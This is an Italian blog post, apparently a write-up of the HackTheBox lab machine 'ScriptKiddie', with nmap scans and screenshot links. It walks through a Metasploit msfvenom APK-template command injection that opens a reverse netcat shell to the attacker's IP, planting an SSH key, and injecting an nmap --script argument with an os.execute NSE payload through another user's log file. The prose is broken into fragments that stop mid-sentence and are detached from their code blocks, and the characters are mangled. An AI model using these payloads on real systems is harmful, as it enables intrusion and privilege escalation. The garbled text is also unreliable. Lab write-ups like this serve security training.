il mio impegno di routine (ah, come amo la routine. com’\u00c3\u00a8 rassicurante<\/em>) \u00c3\u00a8 cercare di fare una VM a settimana su hackthebox.eu<\/p>\n\n\n\n l’ultima \u00c3\u00a8 stata ScriptKiddie. di livello FACILE<\/strong>. in teoria<\/p>\n\n\n\n la VM in questione \u00c3\u00a8 ancora attiva, per cui.. se stai leggendo, vuol dire che ti ho dato la password \ud83d\ude00<\/p>\n\n\n\n cominciamo.<\/p>\n\n\n\n andiamo leggermente pi\u00c3\u00b9 a fondo:<\/p>\n\n\n\n chiaramente mi dirigo via browser sulla porta 5000:<\/p>\n\n\n\n provo a farmi un mi concentro poi sul secondo “blocco”, vedo che la generazione del payload per Linux fallisce sempre, quindi passo a Windows:<\/p>\n\n\n\n si riesce a generare un payload:<\/p>\n\n\n\n che si pu\u00c3\u00b2 scaricare da:<\/p>\n\n\n\n ma non ci si fa granch\u00c3\u00a9.<\/p>\n\n\n\n su \/static e \/payloads si ottiene un bel “Not Found”.<\/p>\n\n\n\n ma a che servir\u00c3\u00a0 quel “template”?<\/p>\n\n\n\n per fortuna mi \u00c3\u00a8 venuto in mente abbastanza presto di cercare “venom exploit template”, e ho trovato questo:<\/p>\n\n\n\n https:\/\/www.rapid7.com\/db\/modules\/exploit\/unix\/fileformat\/metasploit_msfvenom_apk_template_cmd_injection\/<\/a><\/p>\n\n\n\n da le opzioni sono poche ed intuitive:<\/p>\n\n\n\n ho impostat LHOST sull’ip della mia VPN con hackthebox ( a questo punto ho messo in ascolto la porta 5555 sulla mia “attacker machine”:<\/p>\n\n\n\n e ho provato ad usare il tool, stavolta buttandoci dentro il mio “malicious template”:<\/p>\n\n\n\n (su lhost ho messo un ip a cazzo, perch\u00c3\u00a9 tanto ero convinto che avrebbe funzionato la reverse shell generata dall’apk di cui sopra), e infatti:<\/p>\n\n\n\n boom, siamo dentro \ud83d\ude42<\/p>\n\n\n\n ahim\u00c3\u00a9 come utenti NON privilegiati:<\/p>\n\n\n\n mettiamoci subito comodi con una shell “umana” ( in per stare ANCORA PIU’ COMODO, ho messo in sulla mia kali ho spawnato un webserver python al volo:<\/p>\n\n\n\n e ho scaricato dalla VM victim la chiave, copiando nel posto giusto:<\/p>\n\n\n\n ok, ora sono veramente felice \ud83d\ude42<\/p>\n\n\n\n dando un’occhiata in giro, si vede la presenza di un altro user, il che significa chiaramente che bisogna fare “lateral movement<\/em>” prima di fare PRIVESC <\/strong>\ud83d\ude42<\/p>\n\n\n\n si nota la presenza di uno script quindi, prende il terzo campo (separato da spazio) del file \u00c3\u00a8 simpatica l’opportunit\u00c3\u00a0 di provarlo \ud83d\ude42<\/p>\n\n\n\n rimetto in ascolto tcpdump sulla mia VM:<\/p>\n\n\n\n genero il file:<\/p>\n\n\n\n e infatti ricevo ho ricevuto lo scan (verificando sempre con da qui in poi ho perso 2 notti.<\/p>\n\n\n\n una cosa simpatica che mi era venuta in mente (visto che la VM si chiama “Scriptkiddie” che fa pensare all’opzione di ho dato un’occhiata su https:\/\/gtfobins.github.io\/ , in merito a nmap appunto, e ho trovato questo:<\/p>\n\n\n\n ho pensato: magari provo ad eseguire qualcosa con l’utente intanto ho fatto una prova, dopo aver copiato lo script ho creato un semplice script nse (come l’esempio di gtfobins), in modo da verificare che “funzionasse”, ad esempio scrivendo l’output del comando in barba all’errore, il file \u00c3\u00a8 stato generato:<\/p>\n\n\n\n da qui, ho perso veramente troppo tempo.<\/p>\n\n\n\n con l’utente e il file \u00c3\u00a8 stato creato:<\/p>\n\n\n\n non sono riuscito a fare altrettanto con utente pwn.<\/p>\n\n\n\n sbirciando (purtroppo) sul forum ufficiale, ho visto che si parlava di pspy; non ricordavo di averlo gi\u00c3\u00b9 usato. \u00c3\u00a8 un tool che permette di avere una visione pi\u00c3\u00b9 chiara dei processi in tempo reale.<\/p>\n\n\n\n ho scaricato da qui la versione statica a 64bit:<\/p>\n\n\n\n# nmap -T4 -p- -oN 01_nmap.txt 10.10.10.226\n# Nmap 7.91 scan initiated Tue May 25 23:12:28 2021 as: nmap -T4 -p- -oN 01_nmap.txt 10.10.10.226\nNmap scan report for 10.10.10.226\nHost is up (0.048s latency).\nNot shown: 65533 closed ports\nPORT STATE SERVICE\n22\/tcp open ssh\n5000\/tcp open upnp\n<\/code><\/pre>\n\n\n\n# nmap -T4 -p22,5000 -A -oN 02_nmap.txt 10.10.10.226\n# Nmap 7.91 scan initiated Tue May 25 23:25:56 2021 as: nmap -T4 -p22,5000 -A -oN 02_nmap.txt 10.10.10.226\nNmap scan report for 10.10.10.226\nHost is up (0.044s latency).\n\nPORT STATE SERVICE VERSION\n22\/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey:\n| 3072 3c:65:6b:c2:df:b9:9d:62:74:27:a7:b8:a9:d3:25:2c (RSA)\n| 256 b9:a1:78:5d:3c:1b:25:e0:3c:ef:67:8d:71:d3:a3:ec (ECDSA)\n|_ 256 8b:cf:41:82:c6:ac:ef:91:80:37:7c:c9:45:11:e8:43 (ED25519)\n5000\/tcp open http Werkzeug httpd 0.16.1 (Python 3.8.5)\n|_http-server-header: Werkzeug\/0.16.1 Python\/3.8.5\n|_http-title: k1d'5 h4ck3r t00l5\nWarning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port\nAggressive OS guesses: Linux 4.15 - 5.6 (95%), Linux 5.3 - 5.4 (95%), Linux 2.6.32 (95%), Linux 5.0 - 5.3 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 5.0 (93%)\nNo exact OS matches for host (test conditions non-ideal).\nNetwork Distance: 2 hops\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel\n\nTRACEROUTE (using port 443\/tcp)\nHOP RTT ADDRESS\n1 43.92 ms 10.10.14.1\n2 44.17 ms 10.10.10.226\n\n<\/code><\/pre>\n\n\n\n![\"\"](\"http:\/\/www.olografix.org\/frank\/wordpress\/wp-content\/uploads\/sk1-1024x640.png\")
<\/figure>\n\n\n\nnmap <\/code>da solo \ud83d\ude42 metto il mio ip, e in effetti ricevo lo scan dal sito remoto:<\/p>\n\n\n\n![\"\"](\"http:\/\/www.olografix.org\/frank\/wordpress\/wp-content\/uploads\/sk2.png\")
<\/figure>\n\n\n\n# tcpdump -i tun0 -nn not port 5000\ntcpdump: verbose output suppressed, use -v or -vv for full protocol decode\nlistening on tun0, link-type RAW (Raw IP), capture size 262144 bytes\n10:19:47.626618 IP 10.10.10.226.35770 > 10.10.14.28.80: Flags [S], seq 1822080011, win 64240, options [mss 1357,sackOK,TS val 3575408215 ecr 0,nop,wscale 7], length 0\n10:19:47.626655 IP 10.10.14.28.80 > 10.10.10.226.35770: Flags [R.], seq 0, ack 1822080012, win 0, length 0\n10:19:47.626675 IP 10.10.10.226.47216 > 10.10.14.28.443: Flags [S], seq 2628818854, win 64240, options [mss 1357,sackOK,TS val 3575408215 ecr 0,nop,wscale 7], length 0\n10:19:47.626690 IP 10.10.14.28.443 > 10.10.10.226.47216: Flags [R.], seq 0, ack 2628818855, win 0, length 0\n10:19:47.671060 IP 10.10.10.226.33122 > 10.10.14.28.111: Flags [S], seq 2417941658, win 64240, options [mss 1357,sackOK,TS val 3575408260 ecr 0,nop,wscale 7], length 0\n10:19:47.671113 IP 10.10.14.28.111 > 10.10.10.226.33122: Flags [S.], seq 4074904182, ack 2417941659, win 65160, options [mss 1460,sackOK,TS val 1882515510 ecr 3575408260,nop,wscale 7], length 0\n..\n..\n..\n<\/code><\/pre>\n\n\n\n![\"\"](\"http:\/\/www.olografix.org\/frank\/wordpress\/wp-content\/uploads\/sk3.png\")
<\/figure>\n\n\n\n![\"\"](\"http:\/\/www.olografix.org\/frank\/wordpress\/wp-content\/uploads\/sk4.png\")
<\/figure>\n\n\n\nhttp:\/\/10.10.10.226:5000\/static\/payloads\/1cc2ae72ad1d.exe<\/code><\/p>\n\n\n\nmsfconsole<\/code>:<\/p>\n\n\n\nmsf6 > use exploit\/unix\/fileformat\/metasploit_msfvenom_apk_template_cmd_injection<\/code><\/pre>\n\n\n\nmsf6 exploit(unix\/fileformat\/metasploit_msfvenom_apk_template_cmd_injection) > show options\n\nModule options (exploit\/unix\/fileformat\/metasploit_msfvenom_apk_template_cmd_injection):\n\n Name Current Setting Required Description\n ---- --------------- -------- -----------\n FILENAME msf.apk yes The APK file name\n\n\nPayload options (cmd\/unix\/reverse_netcat):\n\n Name Current Setting Required Description\n ---- --------------- -------- -----------\n LHOST 192.168.88.10 yes The listen address (an interface may be specified)\n LPORT 4444 yes The listen port\n\n **DisablePayloadHandler: True (no handler will be created!)**\n<\/code><\/pre>\n\n\n\nset LHOST 10.10.14.28<\/code> ) e la porta (non so perch\u00c3\u00a9 l’ho voluta cambiare \ud83d\ude42 set LPORT 5555<\/code> ), e ho generato il file:<\/p>\n\n\n\nmsf6 exploit(unix\/fileformat\/metasploit_msfvenom_apk_template_cmd_injection) > set LHOST 10.10.14.28\nLHOST => 10.10.14.28\nmsf6 exploit(unix\/fileformat\/metasploit_msfvenom_apk_template_cmd_injection) > set LPORT 5555\nLPORT => 5555\nmsf6 exploit(unix\/fileformat\/metasploit_msfvenom_apk_template_cmd_injection) options\n\nModule options (exploit\/unix\/fileformat\/metasploit_msfvenom_apk_template_cmd_injection):\n\n Name Current Setting Required Description\n ---- --------------- -------- -----------\n FILENAME msf.apk yes The APK file name\n\n\nPayload options (cmd\/unix\/reverse_netcat):\n\n Name Current Setting Required Description\n ---- --------------- -------- -----------\n LHOST 10.10.14.28 yes The listen address (an interface may be specified)\n LPORT 5555 yes The listen port\n\n **DisablePayloadHandler: True (no handler will be created!)**\n\n\nExploit target:\n\n Id Name\n -- ----\n 0 Automatic\n\n\nmsf6 exploit(unix\/fileformat\/metasploit_msfvenom_apk_template_cmd_injection) > run\n\n[+] msf.apk stored at \/root\/.msf4\/local\/msf.apk\n<\/code><\/pre>\n\n\n\nroot@kali:\/opt\/htb\/ScriptKiddie# nc -nlvp 5555\nlistening on [any] 5555 ...\n<\/code><\/pre>\n\n\n\n![\"\"](\"http:\/\/www.olografix.org\/frank\/wordpress\/wp-content\/uploads\/sk5.png\")
<\/figure>\n\n\n\nroot@kali:\/opt\/htb\/ScriptKiddie# nc -nlvp 5555\nlistening on [any] 5555 ...\nconnect to [10.10.14.28] from (UNKNOWN) [10.10.10.226] 44180\n<\/code><\/pre>\n\n\n\n![\"\"](\"http:\/\/www.olografix.org\/frank\/wordpress\/wp-content\/uploads\/sk6.jpg\")
<\/figure>\n\n\n\nbash -i<\/code>)<\/p>\n\n\n\n![\"\"](\"http:\/\/www.olografix.org\/frank\/wordpress\/wp-content\/uploads\/sk7.jpg\")
<\/figure>\n\n\n\n\/home\/kid\/user.txt<\/code> ho trovato il flag, e l’ho submittata su htb \ud83d\ude42<\/p>\n\n\n\nauthorized_keys<\/code> la mia chiave pubblica, e poi mi sono ricollegato sulla VM in ssh (ricordate? nmap mostrava 22\/TCP aperta)<\/p>\n\n\n\n![\"\"](\"http:\/\/www.olografix.org\/frank\/wordpress\/wp-content\/uploads\/sk8.jpg\")
<\/figure>\n\n\n\n![\"\"](\"http:\/\/www.olografix.org\/frank\/wordpress\/wp-content\/uploads\/sk9.jpg\")
<\/figure>\n\n\n\n![\"\"](\"http:\/\/www.olografix.org\/frank\/wordpress\/wp-content\/uploads\/sk10.jpg\")
<\/figure>\n\n\n\nkid@scriptkiddie:~$ cd \/home\/\nkid@scriptkiddie:\/home$ ls -l\ntotal 8\ndrwxr-xr-x 12 kid kid 4096 May 28 08:01 kid\ndrwxr-xr-x 6 pwn pwn 4096 Feb 3 12:06 pwn\n<\/code><\/pre>\n\n\n\nscanlosers.sh<\/code><\/p>\n\n\n\nkid@scriptkiddie:~$ cd \/home\/pwn\/\nkid@scriptkiddie:\/home\/pwn$ ls -l\ntotal 8\ndrwxrw---- 2 pwn pwn 4096 May 28 07:10 recon\n-rwxrwxr-- 1 pwn pwn 250 Jan 28 17:57 scanlosers.sh\n<\/code><\/pre>\n\n\n\nkid@scriptkiddie:\/home\/pwn$ cat scanlosers.sh\n#!\/bin\/bash\n\nlog=\/home\/kid\/logs\/hackers\n\ncd \/home\/pwn\/\ncat $log | cut -d' ' -f3- | sort -u | while read ip; do\n sh -c \"nmap --top-ports 10 -oN recon\/${ip}.nmap ${ip} 2>&1 >\/dev\/null\" &\ndone\n\nif [[ $(wc -l < $log) -gt 0 ]]; then echo -n > $log; fi<\/code><\/pre>\n\n\n\n\/home\/kid\/logs\/hackers<\/code> e ci lancia nmap contro.<\/p>\n\n\n\nroot@kali:~# tcpdump -i tun0 -nn not port 5000 and not port 22\n<\/code><\/pre>\n\n\n\nkid@scriptkiddie:\/home\/pwn$ echo 'a b 10.10.14.28' > \/home\/kid\/logs\/hackers\nkid@scriptkiddie:\/home\/pwn$\n<\/code><\/pre>\n\n\n\ntcpdump -i tun0 -nn not port 5000 and not port 22<\/code>)<\/p>\n\n\n\nnmap<\/code>:<\/p>\n\n\n\n-oS filespec (ScRipT KIdd|3 oUTpuT)\n Script kiddie output is like interactive output, except that it is post-processed to better suit the l33t HaXXorZ who previously looked down on Nmap due to its consistent\n capitalization and spelling. Humor impaired people should note that this option is making fun of the script kiddies before flaming me for supposedly \u00e2\u20ac\u0153helping them\u00e2\u20ac\u009d.<\/code><\/pre>\n\n\n\n![\"\"](\"http:\/\/www.olografix.org\/frank\/wordpress\/wp-content\/uploads\/sk12.jpg\")
<\/figure>\n\n\n\npwn<\/code>, manipolando il contenuto del file \/home\/kid\/logs\/hackers<\/code><\/p>\n\n\n\nscanlosers.sh<\/code> nella home di kid<\/code>.<\/p>\n\n\n\nid <\/code>dentro \/tmp<\/code>:<\/p>\n\n\n\nkid@scriptkiddie:~$ echo 'os.execute(\"\/usr\/bin\/id > \/tmp\/kid.txt\")' > \/tmp\/kidscript.nse\n<\/code><\/pre>\n\n\n\nkid@scriptkiddie:~$ nmap --top-ports 10 --script=\/tmp\/kidscript.nse 127.0.0.1\nStarting Nmap 7.80 ( https:\/\/nmap.org ) at 2021-05-28 09:06 UTC\nNSE: failed to initialize the script engine:\n\/usr\/bin\/..\/share\/nmap\/nse_main.lua:621: \/tmp\/kidscript.nse is missing required field: 'action'\nstack traceback:\n [C]: in function 'error'\n \/usr\/bin\/..\/share\/nmap\/nse_main.lua:621: in field 'new'\n \/usr\/bin\/..\/share\/nmap\/nse_main.lua:823: in local 'get_chosen_scripts'\n \/usr\/bin\/..\/share\/nmap\/nse_main.lua:1310: in main chunk\n [C]: in ?\n\nQUITTING!\n<\/code><\/pre>\n\n\n\nkid@scriptkiddie:~$ cat \/tmp\/kid.txt\nuid=1000(kid) gid=1000(kid) groups=1000(kid)\n<\/code><\/pre>\n\n\n\nkid <\/code>sembrava funzionare come mi aspettavo (lo script scanlosers.sh<\/code> l’ho leggermente modificato per usare i path relativi a kid<\/code>)<\/p>\n\n\n\nkid@scriptkiddie:~$ cat scanlosers.sh\n#!\/bin\/bash\n\nlog=\/home\/kid\/test\n\ncd \/home\/kid\/\ncat $log | cut -d' ' -f3- | sort -u | while read ip; do\n sh -c \"nmap --top-ports 10 -oN recon\/${ip}.nmap ${ip} 2>&1 >\/dev\/null\" &\ndone\n\nif [[ $(wc -l < $log) -gt 0 ]]; then echo -n > $log; fi\n<\/code><\/pre>\n\n\n\nkid@scriptkiddie:~$ echo 'a b 10.10.14.28 --script=\/tmp\/kidscript.nse' > \/home\/kid\/test\n<\/code><\/pre>\n\n\n\nkid@scriptkiddie:~$ sh scanlosers.sh\nscanlosers.sh: 10: [[: not found\nkid@scriptkiddie:~$ NSE: failed to initialize the script engine:\n\/usr\/bin\/..\/share\/nmap\/nse_main.lua:621: \/tmp\/kidscript.nse is missing required field: 'action'\nstack traceback:\n [C]: in function 'error'\n \/usr\/bin\/..\/share\/nmap\/nse_main.lua:621: in field 'new'\n \/usr\/bin\/..\/share\/nmap\/nse_main.lua:823: in local 'get_chosen_scripts'\n \/usr\/bin\/..\/share\/nmap\/nse_main.lua:1310: in main chunk\n [C]: in ?\n\nQUITTING!\n\n<\/code><\/pre>\n\n\n\nkid@scriptkiddie:~$ cat \/tmp\/kid.txt\nuid=1000(kid) gid=1000(kid) groups=1000(kid)\n<\/code><\/pre>\n\n\n\n
![\"\"](\"http:\/\/www.olografix.org\/frank\/wordpress\/wp-content\/uploads\/sk13.jpg\")
<\/figure>\n\n\n\n![\"\"](\"http:\/\/www.olografix.org\/frank\/wordpress\/wp-content\/uploads\/sk14-1024x125.jpg\")
<\/figure>\n\n\n\n![\"\"](\"http:\/\/www.olografix.org\/frank\/wordpress\/wp-content\/uploads\/sk15.jpg\")
<\/figure>\n\n\n\n![\"\"](\"http:\/\/www.olografix.org\/frank\/wordpress\/wp-content\/uploads\/sk16.jpg\")
<\/figure>\n\n\n\n![\"\"](\"http:\/\/www.olografix.org\/frank\/wordpress\/wp-content\/uploads\/sk17.jpg\")
<\/figure>\n\n\n\n![\"\"](\"http:\/\/www.olografix.org\/frank\/wordpress\/wp-content\/uploads\/sk18.jpg\")
<\/figure>\n\n\n\n